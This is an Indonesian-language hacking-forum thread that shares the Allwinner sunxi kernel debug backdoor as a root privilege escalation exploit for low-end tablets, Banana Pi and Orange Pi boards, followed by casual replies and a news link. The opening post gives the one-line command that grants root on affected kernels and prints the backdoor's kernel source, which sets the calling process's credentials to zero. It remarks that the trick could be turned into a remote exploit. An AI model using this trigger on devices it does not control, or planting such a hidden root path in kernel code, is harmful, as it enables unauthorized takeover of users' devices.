Exploit AllWinner-ARM built-in backdoor

Assalamualikum Wr. Wb.

Selamat pagi warga2 DC cantik n tampan semua… :bangga:
Kali ini mau sharing sedikit ilmu mengenai Root Privilege Escalation dari device yang berbasis sama Allwinner chip, biasanya ini di pake sama low-end tablet ato android phone, atau buat yang suka developing electronic dia affected ke Banana-PI Micro PC, Orange-Pi, yaaa… pokonya yang pake OSnya [color=#FF4500]A83T, H3, H8 dan juga kernel 3.4[/color]…:prustasi:

Yup… exploit ini dari feature developer mode dari kernel sendiri itu yang lupa di hapus ama dianya… kernel ini Linux 3.4-sunxi kernel yang awalnya hanya untuk beberapa android device sekarang untuk porting beberpa macam device sekaligus… makanya makenya hanya semudah ini :
[php]echo “rootmydevice” > /proc/sunxi_debug/sunxi_debug[/php]
Nah… ane yakin dah pada jago disini nah ini bisa di jadiin remote exploit juga sebenernya… :hore:

Karna itu bisa di lakuin untuk UID berapa aja dan proses mana aja… :mantap:

ni dia Source Code Exploitnya:
[php]/*

  • Sunxi_debug.c
  • This program is free software; you can redistribute it and/or modify
  • it under the terms of the GNU General Public License version 2 as
  • published by the Free Software Foundation.
    */
    #include <linux/kernel.h>
    #include <linux/types.h>
    #include <linux/export.h>
    #include <linux/kthread.h>

#include <linux/debugfs.h>
#include <linux/proc_fs.h>//add by fe3o4
#include <linux/uaccess.h>
#include <linux/cred.h>

static struct proc_dir_entry *proc_root;
static struct proc_dir_entry * proc_su;

static int sunxi_proc_su_write(struct file *file, const char __user *buffer,
unsigned long count, void *data)
{
char *buf;
struct cred *cred;

if (count < 1)
    return -EINVAL;

buf = kmalloc(count, GFP_KERNEL);
if (!buf)
    return -ENOMEM;

if (copy_from_user(buf, buffer, count)) {
    kfree(buf);
    return -EFAULT;
}

if(!strncmp("rootmydevice",(char*)buf,12)){
    cred = (struct cred *)__task_cred(current);
    cred->uid = 0;
    cred->gid = 0;
    cred->suid = 0;
    cred->euid = 0;
    cred->euid = 0;
    cred->egid = 0;
    cred->fsuid = 0;
    cred->fsgid = 0;
    printk("now you are root\n");
}

kfree(buf);
return count;

}

static int sunxi_proc_su_read(char *page, char **start, off_t off,
int count, int *eof, void *data)
{
printk(“sunxi debug: rootmydevice\n”);
return 0;
}

static int sunxi_root_procfs_attach(void)
{
proc_root = proc_mkdir(“sunxi_debug”, NULL);
proc_su= create_proc_entry(“sunxi_debug”, 0666, proc_root);
if (IS_ERR(proc_su)){
printk(“create sunxi_debug dir error\n”);
return -1;
}
proc_su->data = NULL;
proc_su->read_proc = sunxi_proc_su_read;
proc_su->write_proc = sunxi_proc_su_write;
return 0;

}

static int sunxi_debug_init(void)
{
int ret;
ret = sunxi_root_procfs_attach();
printk("===fe3o4==== sunxi_root_procfs_attach ret:%d\n", ret);
if(ret){
printk("===fe3o4== sunxi_root_procfs_attach failed===\n ");
}
return ret;
}

subsys_initcall(sunxi_debug_init);
[/php]

okey sekian dulu aja dari ane…
makasih dah baca… dan Om Mod kalo basi hapus aja langsung… :maling:
maaf kalo ada salah2 tulisa namanya juga NOOB… :sungkem
thanks semua DCers…
Wassalamualaikum. Wr. Wb.:wawa:

ra paham aku mas :hammer

aokwokawok pernah liat di forum luar nih xD

ajarin kaka :tersipu:

Sama ane juga ga paham… cuman pura2 paham ama bikin thread aja biar tenar di DC… :mantap:

iya om dari THN… :sungkem

Apanya yang di ajarin kaka…?
:tersipu:

ah ARM sih , tadinya mau di tes di system ane :tersipu: :stuck_out_tongue:

tread opo ki jindal :ngamuk: benake ndes

hahha… mana modnya mana modnya… apus nih apus… :dead:

ra paham … ts ilmunya ketinggian :hammer kapan ane bisa ke banding belajar sama ts :nangis:

yaelah gitu aja ngga ngerti :ngacir:

hahhah… kan ane juga belajar dari ente… :mantap:
ayo dah kita kopdar di bandung yu… :heh:

hahahha… kena lo ama yg jago… :dead:

Wah mantep. Nunggu ada device nya dulu tapi :smiley:

beli banan pi aja om… :mantap:

ini device nya yg di backdoor sama vendornya bisa di cek beritanya di http://thehackernews.com/2016/05/android-kernal-exploit.html

pancen jos cah iki… :))

ajib zmo